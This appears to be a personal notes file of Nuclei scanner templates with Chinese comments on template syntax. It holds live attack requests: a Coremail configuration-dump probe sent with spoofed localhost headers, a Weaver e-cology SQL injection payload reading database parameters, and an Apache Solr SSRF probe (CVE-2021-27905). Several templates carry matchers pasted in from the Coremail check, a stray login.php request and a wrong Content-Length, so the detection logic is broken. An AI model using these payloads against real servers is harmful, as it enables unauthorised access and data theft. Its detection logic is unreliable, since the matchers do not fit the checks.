1: severity: info #定义危险级别 info medium critical high
2:{{BaseURL}} 原始读取的URL
{{Hostname}} 请求头中的Host
3: redirects: true #是否 重定向
max-redirects: 3 #最大重定向的深度
4: matchers-condition: and #多个条件之间的
5: negative: true 负匹配器
6: extractors: regex kval group: 1
7: cookie-reuse: true
id: temple-get
info:
name: get-info
author: YanYun
severity: medium
tags: dir,email,java
requests:
- method: GET
headers:
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
path:
- "{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/"
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200"
- type: status
status:
- 200
- type: word
words:
- '<string name="configHome">/home/coremail</string>'
- '404'
condition: and
negative: true
- type: word
name: php
words:
- "X-Powered-By: PHP"
part: header
id: Coremail-info
info:
name: Coremail-info
author: YanYun
severity: medium
tags: dir,email,java
requests:
- method: POST
headers:
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
path:
- "{{BaseURL}}/admin"
body: 'admin=test'
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200"
- type: status
status:
- 200
- type: word
words:
- '<string name="configHome">/home/coremail</string>'
- '404'
condition: and
negative: true
- type: word
name: php
words:
- "X-Powered-By: PHP"
part: header
id: oa-cology-sql
info:
name: oa-cology-sql
author: Yanyun
severity: info
tages: sql,oa,java,dir
requests:
- raw:
- |
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Upgrade-Insecure-Requests: 1
formids=11111111111))) select NULL,value from v$parameter order by (((1
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200"
- type: status
status:
- 200
- type: word
words:
- '<string name="configHome">/home/coremail</string>'
- '404'
condition: and
negative: true
id: CVE-2021-27905
info:
name: Apache Solr <= 8.8.1 SSRF
author: hackergautam
severity: medium
tags: cve,cve2021,apache,solr,ssrf
requests:
- raw:
- |
GET /account/login.php HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '<input type="hidden" name="846c3d198c2af4004cdc58e6e5f00468d81bdda4" value="(.*?)">'
name: core
group: 1
internal: true
matchers-condition: and
matchers:
- type: status
status:
- 404
- type: word
words:
- 'tokenId'
